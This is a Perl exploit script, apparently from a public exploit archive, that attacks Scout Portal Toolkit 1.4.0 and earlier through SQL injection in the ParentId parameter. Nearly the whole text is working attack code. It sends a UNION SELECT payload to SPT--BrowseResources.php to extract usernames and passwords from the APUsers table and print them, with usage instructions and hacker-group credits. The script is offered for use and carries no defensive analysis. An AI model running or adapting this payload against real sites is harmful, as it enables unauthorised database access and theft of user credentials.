Scout Portal Toolkit <= 1.4.0 (ParentId) Remote SQL Injection Exploit

#!/usr/bin/perl # Scout Portal Toolkit <= 1.4.0 (ParentId) Remote SQL Injection Exploit # Discovered & Coded by JosS # Contact: sys-project[at]hotmail.com # Spanish Hackers Team / Sys - Project / EspSeC # http://www.spanish-hackers.com # rgod forever :D print " ######################################################## "; print " # Scout Portal Toolkit <= 1.4.0 SQL Injection Exploit # "; print " # by JosS # "; print " ######################################################## "; use strict; use LWP::UserAgent; my $victim = $ARGV[0]; if(!$ARGV[0]) { print " [x] Scout Portal Toolkit <= 1.4.0 Remote SQL Injection Exploit "; print "[x] written by JosS - sys-project[at]hotmail.com "; print "[x] usage: perl xpl.pl [host] "; print "[x] example: http://localhost/path/ "; exit(1); } print " [+] Exploiting... "; my $cnx = LWP::UserAgent->new() or die; my $go=$cnx->get($victim."/SPT--BrowseResources.php?ParentId=337+and+1=2+union+all+select+0,1,2,3,4,concat(UserName,char(34),UserPassword),6,7,8+from+APUsers/*"); if ($go->content =~ m/APUsers/*' class=''>(.*?)</a>/ms) { print "[+] $1 "; } else { print " [-] exploit failed "; } # sebug.net